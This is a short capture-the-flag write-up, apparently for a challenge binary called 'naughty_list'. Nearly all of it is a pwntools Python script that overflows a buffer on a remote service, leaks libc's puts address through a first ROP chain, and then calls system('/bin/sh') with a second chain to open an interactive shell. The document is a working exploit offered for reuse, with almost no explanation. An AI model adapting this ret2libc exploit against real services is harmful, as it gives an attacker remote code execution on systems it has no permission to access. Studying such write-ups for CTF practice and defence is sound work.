### Author : Nima Dabbaghi

-----

```
#!/usr/bin/env python3

from pwn import *

elf = ELF("./naughty_list")
libc = ELF("./libc.so.6")

context.binary = elf
rop = ROP(elf)

context.log_level = "debug"

p = remote("ip",port)

p.sendlineafter(b":", b"nova")
p.sendlineafter(b":", b"security")
p.sendlineafter(b":", b"50")

rop.puts(elf.got.puts)
rop.call(elf.sym.get_descr)

payload = flat({40: rop.chain()})

p.sendlineafter(b":", payload)

p.recvuntil(b"!\n")
leak = u64(p.recv(6).ljust(8, b"\x00"))
info(f"Leaked libc.puts @ {hex(leak)} ")

libc.address = leak - libc.sym.puts
success(f"Leaked libc @ {hex(libc.address)}")

rop2 = ROP(libc)

binsh = next(libc.search(b"/bin/sh"))

rop2.raw(0x0000000000401443)
rop2.raw(binsh)
rop2.raw(pack(0x0000000000400756))
rop2.raw(libc.sym.system)

payload = flat({40: rop2.chain()})
p.sendlineafter(b":", payload)

p.interactive()
```

*need have libc.so.6 and test file*

Original writeup (https://novasecurity.net/).